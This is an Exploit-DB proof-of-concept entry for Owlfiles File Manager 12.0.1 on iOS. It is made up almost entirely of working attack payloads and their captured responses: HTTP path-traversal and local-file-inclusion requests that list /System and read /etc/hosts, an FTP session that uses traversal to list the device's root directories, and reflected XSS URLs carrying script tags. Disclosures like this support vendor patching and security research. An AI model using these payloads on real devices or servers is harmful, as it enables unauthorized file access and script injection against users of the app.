Owlfiles File Manager 12.0.1 - Multiple Vulnerabilities

EDB-ID:

51036

CVE:

N/A




Platform:

iOS

Date:

2023-03-23


# Exploit Title: Owlfiles File Manager 12.0.1 - Multiple Vulnerabilities
# Date: Sep 19, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.skyjos.com/
# Software Link:
https://apps.apple.com/us/app/owlfiles-file-manager/id510282524
# Version: 12.0.1
# Tested on: iPhone iOS 16.0



###########
path traversal on HTTP built-in server
###########

GET /../../../../../../../../../../../../../../../System/ HTTP/1.1
Host: localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)
AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e
Safari/8536.25
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
If-None-Match: 42638202/1663558201/177889085
If-Modified-Since: Mon, 19 Sep 2022 03:30:01 GMT
Connection: close
Content-Length: 0

-------
HTTP/1.1 200 OK
Cache-Control: max-age=3600, public
Content-Length: 317
Content-Type: text/html; charset=utf-8
Connection: Close
Server: GCDWebUploader
Date: Mon, 19 Sep 2022 05:01:11 GMT

<!DOCTYPE html>
<html><head><meta charset="utf-8"></head><body>
<ul>
<li><a href="Cryptexes/">Cryptexes/</a></li>
<li><a href="DriverKit/">DriverKit/</a></li>
<li><a href="Library/">Library/</a></li>
<li><a href="Applications/">Applications/</a></li>
<li><a href="Developer/">Developer/</a></li>
</ul>
</body></html>


#############
LFI on HTTP built-in server
#############

GET /../../../../../../../../../../../../../../../etc/hosts HTTP/1.1
Host: localhost:8080
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)
AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e
Safari/8536.25
X-Requested-With: XMLHttpRequest
Referer: http://localhost:8080/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close


----

HTTP/1.1 200 OK
Connection: Close
Server: GCDWebUploader
Content-Type: application/octet-stream
Last-Modified: Sat, 03 Sep 2022 01:37:01 GMT
Date: Mon, 19 Sep 2022 03:28:14 GMT
Content-Length: 213
Cache-Control: max-age=3600, public
Etag: 1152921500312187994/1662169021/0

##
# Host Database
#
# localhost is used to configure the loopback interface
# when the system is booting.  Do not change this entry.
##
127.0.0.1 localhost
255.255.255.255 broadcasthost
::1             localhost



###############
path traversal on FTP built-in server
###############

ftp> cd ../../../../../../../../../
250 OK. Current directory is /../../../../../../../../../
ftp> ls
200 PORT command successful.
150 Accepted data connection
total 10
drwxr-xr-x     0 root wheel        256 Jan 01 1970 usr
drwxr-xr-x     0 root wheel        128 Jan 01 1970 bin
drwxr-xr-x     0 root wheel        608 Jan 01 1970 sbin
drwxr-xr-x     0 root wheel        224 Jan 01 1970 System
drwxr-xr-x     0 root wheel        640 Jan 01 1970 Library
drwxr-xr-x     0 root wheel        224 Jan 01 1970 private
drwxr-xr-x     0 root wheel       1131 Jan 01 1970 dev
drwxr-xr-x     0 root admin       4512 Jan 01 1970 Applications
drwxr-xr-x     0 root admin         64 Jan 01 1970 Developer
drwxr-xr-x     0 root admin         64 Jan 01 1970 cores
WARNING! 10 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
ftp>

#############
XSS on HTTP built-in server
#############

poc 1:

http://localhost:8080/download?path=<script>alert(1)</script>

poc 2:

http://localhost:8080/list?path=<script>alert(1)</script>